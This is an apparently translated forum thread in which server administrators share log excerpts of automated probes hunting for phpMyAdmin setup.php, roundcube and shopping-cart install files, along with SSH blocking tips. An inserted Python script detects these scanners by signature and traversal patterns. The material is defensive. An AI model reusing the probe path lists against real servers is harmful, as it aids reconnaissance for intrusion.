Thread for exposing the IPs that hit us with an Attack No.1
212.83.42.101
A regular on my web server. It looks for MyAdmin myadmin mysql phpMyAdmin phpmyadmin pma webdav geeklog/bbs/fckeditor/editor and all sorts of other folders and requests whatever it can, and it also tries its hardest to log in over ssh.

>>2
The IP is different every time, but they keep coming to my server too, looking for phpMyAdmin, pma and so on.

There's a lot of phpMyAdmin, isn't there.
Apart from that it's nothing but robots.

Feb 1 20:53:36 192 sshd[30181]: refused connect from ::ffff:221.206.130.3 (::ffff:221.206.130.3)
Feb 1 21:50:22 192 sshd[30308]: refused connect from ::ffff:221.206.130.3 (::ffff:221.206.130.3)
Feb 1 23:10:01 192 sshd[30585]: refused connect from ::ffff:61.163.56.24 (::ffff:61.163.56.24)
Feb 1 23:50:12 192 sshd[30654]: refused connect from ::ffff:61.163.56.24 (::ffff:61.163.56.24)
Feb 2 00:20:23 192 sshd[30768]: refused connect from ::ffff:60.12.11.62 (::ffff:60.12.11.62)
Feb 2 01:54:23 192 sshd[30957]: refused connect from ::ffff:128.226.170.170 (::ffff:128.226.170.170)
Feb 2 04:37:54 192 sshd[31317]: refused connect from ::ffff:202.205.176.115 (::ffff:202.205.176.115)
After I changed the SSH port from 22 they stopped coming completely, but when I tried putting it back on 22 they came again.
I wonder if they only target hosts where 22 is open.

I get a lot of phpMyAdmin-related stuff too.
# cat /var/log/httpd/access_log | grep 110.172.52.5 | wc -l
951

crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:00 +0900] "GET /php-my-admin/scripts/setup.php HTTP/1.1" 404 228
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:00 +0900] "GET /phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:00 +0900] "GET /phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:01 +0900] "GET /phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:01 +0900] "GET /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:02 +0900] "GET /phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:02 +0900] "GET /phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:02 +0900]
"GET /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1" 404 232 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:03 +0900] "GET /phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:03 +0900] "GET /phpMyAdmin-2.5.6-rc1/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:03 +0900] "GET /phpMyAdmin-2.5.6-rc2/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:04 +0900] "GET /phpMyAdmin-2.5.6/scripts/setup.php HTTP/1.1" 404 232 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:04 +0900] "GET /phpMyAdmin-2.5.7/scripts/setup.php HTTP/1.1" 404 232 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:05 +0900] "GET /phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:05 +0900] "GET /phpMyAdmin-2.6.0-alpha/scripts/setup.php HTTP/1.1" 404 238 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:05 +0900] "GET /phpMyAdmin-2.6.0-alpha2/scripts/setup.php HTTP/1.1" 404 239 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:06 +0900] "GET /phpMyAdmin-2.6.0-beta1/scripts/setup.php HTTP/1.1" 404 238 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:06 +0900] "GET /phpMyAdmin-2.6.0-beta2/scripts/setup.php HTTP/1.1" 404 238 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:06 +0900] "GET /phpMyAdmin-2.6.0-rc1/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:07 +0900] "GET /phpMyAdmin-2.6.0-rc2/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:07 +0900] "GET /phpMyAdmin-2.6.0-rc3/scripts/setup.php HTTP/1.1" 404 236 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:08 +0900] "GET /phpMyAdmin-2.6.0/scripts/setup.php HTTP/1.1" 404 232 crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:08 +0900] "GET /phpMyAdmin-2.6.0-pl1/scripts/setup.php HTTP/1.1" 404 236 
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:08 +0900] "GET /phpMyAdmin-2.6.0-pl2/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:09 +0900] "GET /phpMyAdmin-2.6.0-pl3/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:22 +0900] "GET /phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.1" 404 232

So it's this kind of thing, huh.

This one. Attack NO1 lol
FNAfb-09p2-253.ppp11.odn.ad.jp

91.121.243.113
Same as >7. Swept through everything phpMyAdmin-related.

>2
For sshd I recommend denyhosts.
It automatically blocks the addresses that attacked you.
Current state at my place:
% egrep ^sshd /etc/hosts.deny | wc -l
1100

Apache doesn't write anything to the log unless there's a request, does it?

(ASCII art) Attack chance!!

61.19.255.14 - - [07/Feb/2011:03:59:46 +0900] "GET /roundcubemail/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
61.19.255.14 - - [07/Feb/2011:03:59:46 +0900] "GET /rc/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
61.19.255.14 - - [07/Feb/2011:03:59:46 +0900] "GET /webmail/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
61.19.255.14 - - [07/Feb/2011:03:59:47 +0900] "GET /roundcube/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
61.19.255.14 - - [07/Feb/2011:03:59:47 +0900] "GET /mail/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
61.19.255.14 - - [07/Feb/2011:03:59:47 +0900] "GET /README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
Besides phpMyAdmin, this kind of thing has started coming recently too.

They're simply checking whether you have roundcube installed, aren't they.

I've never used roundcube so I don't know, but doesn't it have security holes like phpMyAdmin?
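Added example, not part of any post in this thread: a small log triage script in the spirit of the automatic blocking recommended above for sshd, applied to the Apache access_log probes shown in the excerpts. The signature strings are copied from the log lines posted in the thread; the sample lines (documentation IP ranges), the thresholds and the function names are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format; the referer/user-agent pair is optional
# because some excerpts in the thread use the shorter "common" format.
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

# User-Agent banners copied from the log excerpts posted in the thread.
SCANNER_AGENTS = (
    "Morfeus strikes again.",
    "Made by ZmEu",
    "Toata dragostea mea pentru diavola",
)

# Request patterns visible in the thread's excerpts.
PROBE_PATHS = (
    re.compile(r"/scripts/setup\.php$"),  # phpMyAdmin setup.php sweep
    re.compile(r"^/w00tw00t\."),          # scanner banner request
    re.compile(r"(?:\.\./){2,}"),         # directory traversal in the query
)


def parse(line):
    """Parse one access_log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_scanners(lines, burst=5, window=timedelta(seconds=60)):
    """Return {host: sorted reasons} for hosts whose requests look like scanning.

    burst/window (assumed thresholds): flag a host that receives 4xx responses
    for at least `burst` distinct paths within `window`.
    """
    reasons = defaultdict(set)
    misses = defaultdict(list)  # host -> [(time, path)] for 4xx responses
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        host = rec["host"]
        agent = rec["agent"] or ""
        if any(sig in agent for sig in SCANNER_AGENTS):
            reasons[host].add("scanner-user-agent")
        if any(p.search(rec["path"]) for p in PROBE_PATHS):
            reasons[host].add("probe-path")
        if 400 <= rec["status"] < 500:
            misses[host].append((rec["time"], rec["path"]))
    for host, hits in misses.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # Slide the window start forward until it spans at most `window`.
            while hits[end][0] - hits[start][0] > window:
                start += 1
            if len({path for _, path in hits[start:end + 1]}) >= burst:
                reasons[host].add("4xx-burst")
                break
    return {host: sorted(r) for host, r in reasons.items()}


# Constructed sample input (not real traffic), modelled on the excerpts above.
SAMPLE = """\
192.0.2.10 - - [22/Feb/2011:01:49:51 +0900] "GET /scripts/setup.php HTTP/1.1" 404 228 "-" "-"
192.0.2.10 - - [22/Feb/2011:01:49:52 +0900] "GET /db/scripts/setup.php HTTP/1.1" 404 228 "-" "-"
192.0.2.10 - - [22/Feb/2011:01:49:57 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
192.0.2.10 - - [22/Feb/2011:01:50:03 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
192.0.2.10 - - [22/Feb/2011:01:50:09 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 228 "-" "-"
198.51.100.7 - - [07/Feb/2011:03:59:46 +0900] "GET /roundcube/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
203.0.113.5 - - [07/Feb/2011:04:10:00 +0900] "GET /index.html HTTP/1.1" 200 8097 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Feb/2011:04:10:02 +0900] "GET /favicon.ico HTTP/1.1" 404 210 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for host, why in sorted(find_scanners(SAMPLE).items()):
        print(host, ",".join(why))
```

The ordinary visitor with a single 404 is not flagged; only hosts matching a signature or crossing the burst threshold are returned.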
Got exactly the same thing as >>14.
The date and time were almost the same too.
Also things like this:
67.205.111.77 (5rreo.com)
Date,Time,Method,URL,Query,HTTP,Status,Size,Referer,Keyword,Agent
2011/02/04,03:15:23,GET,"/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:24,GET,"/cart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:25,GET,"/zen-cart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:25,GET,"/zencart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:26,GET,"/zen/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:27,GET,"/butik/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:27,GET,"/shop/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:28,GET,"/butik/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:28,GET,"/zcart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:29,GET,"/catalog/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:29,GET,"/shop2/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:30,GET,"/boutique/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:31,GET,"/store/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"

http://members3.jcom.home.ne.jp/rising-sun/
Ever since my URL was listed here, spammers have been coming in droves to post.
Until then I was getting about 5 hits a month, so I have no idea how they found my site.

Probably got picked up by some dumb site searcher lol

What an idiot.

The IPs that have been bombing my bulletin board at intervals of five minutes to several hours

Today's porn POSTs

To the poster above:
For POST spam there are more tools than you can count that submit while changing IPs, so I'd think exposing them is pointless no matter how many you post.
With a tool you can earn about 500,000 a month lol

MA NU KE HA SI N DE KU RE

>>26
Some of them do change IPs, but 223.132.1.24 shows up in my log more than 9,000 times.

p840118.tokynt01.ap.so-net.ne.jp

Even if it's painful, even if it's sad, I'm fine as long as I'm inside a jail? ...sorry

91.121.108.5 [22/Feb/2011:01:49:51 +0900] "GET /scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:49:51 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
91.121.108.5 [22/Feb/2011:01:49:52 +0900] "GET /db/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:49:57 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:50:03 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:50:09 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:50:15 +0900] "GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:50:21 +0900] "GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:50:27 +0900] "GET /web/scripts/setup.php HTTP/1.1" 404 REF:-

89.149.242.190 [22/Feb/2011:02:44:30 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
89.149.242.190 [22/Feb/2011:02:44:31 +0900] "GET /PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:31 +0900] "GET /3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:37 +0900] "GET /PMA/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:43 +0900] "GET /PMA2005/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:52 +0900] "GET /SSLMySQLAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:58 +0900] "GET /admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:04 +0900] "GET /admin/pma/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:10 +0900] "GET /admin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190
[22/Feb/2011:02:45:16 +0900] "GET /bbs/data/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:22 +0900] "GET /cpadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:28 +0900] "GET /cpadmindb/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:34 +0900] "GET /cpanelmysql/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:40 +0900] "GET /cpanelphpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:46 +0900] "GET /cpanelsql/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:52 +0900] "GET /cpdbadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:45:58 +0900] "GET /cpphpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:04 +0900] "GET /db/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:10 +0900] "GET /dbadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:16 +0900] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:22 +0900] "GET /mysql-admin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:28 +0900] "GET /mysql/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:34 +0900] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:35 +0900] "GET /mysqlmanager/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:41 +0900] "GET /p/m/a/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:35 +0900] "GET /mysqladminconfig/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:47 +0900] "GET /pMA/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:53 +0900] "GET /php-my-admin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:46:59 +0900] "GET /php-myadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:05 +0900] "GET 
/phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:11 +0900] "GET /phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:17 +0900] "GET /phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:23 +0900] "GET /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:29 +0900] "GET /phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:35 +0900] "GET /phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:41 +0900] "GET /phpMyAdmin-2.5.5-rc1config/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:47 +0900] "GET /phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:53 +0900] "GET /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:47:59 +0900] "GET /phpMyAdmin-2.5.6-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:05 +0900] "GET /phpMyAdmin-2.5.6-rc2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:11 +0900] "GET /phpMyAdmin-2.5.6/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:17 +0900] "GET /phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:23 +0900] "GET /phpMyAdmin-2.5.7/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:29 +0900] "GET /phpMyAdmin-2.6.0-alpha/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:35 +0900] "GET /phpMyAdmin-2.6.0-alpha2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:39 +0900] "GET /phpMyAdmin-2.6.0-beta2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:38 +0900] "GET /phpMyAdmin-2.6.0-beta1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:45 +0900] "GET /phpMyAdmin-2.6.0-pl1/scripts/setup.php HTTP/1.1" 
404 REF:- 89.149.242.190 [22/Feb/2011:02:48:51 +0900] "GET /phpMyAdmin-2.6.0-pl2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:48:57 +0900] "GET /phpMyAdmin-2.6.0-pl3/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:03 +0900] "GET /phpMyAdmin-2.6.0-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:09 +0900] "GET /phpMyAdmin-2.6.0-rc2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:15 +0900] "GET /phpMyAdmin-2.6.0-rc3/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:21 +0900] "GET /phpMyAdmin-2.6.0/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:27 +0900] "GET /phpMyAdmin-2.6.1-pl1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:33 +0900] "GET /phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:39 +0900] "GET /phpMyAdmin-2.6.1-pl3/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:45 +0900] "GET /phpMyAdmin-2.6.1-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:51 +0900] "GET /phpMyAdmin-2.6.1-rc2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:49:57 +0900] "GET /phpMyAdmin-2.6.1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:03 +0900] "GET /phpMyAdmin-2.6.2-beta1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:09 +0900] "GET /phpMyAdmin-2.6.2-pl1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:15 +0900] "GET /phpMyAdmin-2.6.2-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:21 +0900] "GET /phpMyAdmin-2.6.2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:27 +0900] "GET /phpMyAdmin-2.6.3-pl1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:33 +0900] "GET /phpMyAdmin-2.6.3-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:39 
+0900] "GET /phpMyAdmin-2.6.3/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:43 +0900] "GET /phpMyAdmin-2.6.4-pl2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:42 +0900] "GET /phpMyAdmin-2.6.4-pl1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:49 +0900] "GET /phpMyAdmin-2.6.4-pl3/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:50:55 +0900] "GET /phpMyAdmin-2.6.4-pl4/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:01 +0900] "GET /phpMyAdmin-2.6.4-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:07 +0900] "GET /phpMyAdmin-2.6.4/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:13 +0900] "GET /phpMyAdmin-2.7.0-beta1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:19 +0900] "GET /phpMyAdmin-2.7.0-pl1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:25 +0900] "GET /phpMyAdmin-2.7.0-pl2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:31 +0900] "GET /phpMyAdmin-2.7.0-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:37 +0900] "GET /phpMyAdmin-2.7.0/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:43 +0900] "GET /phpMyAdmin-2.8.0-beta1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:49 +0900] "GET /phpMyAdmin-2.8.0-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:51:55 +0900] "GET /phpMyAdmin-2.8.0-rc2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:01 +0900] "GET /phpMyAdmin-2.8.0.1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:07 +0900] "GET /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:13 +0900] "GET /phpMyAdmin-2.8.0.3/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:19 +0900] "GET /phpMyAdmin-2.8.0.4/scripts/setup.php 
HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:25 +0900] "GET /phpMyAdmin-2.8.0/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:31 +0900] "GET /phpMyAdmin-2.8.1-rc1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:37 +0900] "GET /phpMyAdmin-2.8.1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:43 +0900] "GET /phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:46 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:46 +0900] "GET /phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:52 +0900] "GET /phpMyAdmin2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:52:58 +0900] "GET /phpadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:04 +0900] "GET /phpmanager/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:10 +0900] "GET /phpmy-admin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:16 +0900] "GET /phpmya/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:22 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:28 +0900] "GET /phpmyadmin1/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:34 +0900] "GET /phpmyadmin2/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:40 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:46 +0900] "GET /pma2005/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:52 +0900] "GET /roundcube/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:53:58 +0900] "GET /scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:54:04 +0900] "GET /sl2/data/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:54:10 +0900] "GET /sqladmin/scripts/setup.php HTTP/1.1" 404 
REF:-
89.149.242.190 [22/Feb/2011:02:54:16 +0900] "GET /sqlmanager/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:22 +0900] "GET /sqlweb/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:28 +0900] "GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:34 +0900] "GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:40 +0900] "GET /web/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:46 +0900] "GET /webadmin/scripts/setup.php HTTP/1.1" 404 REF:-
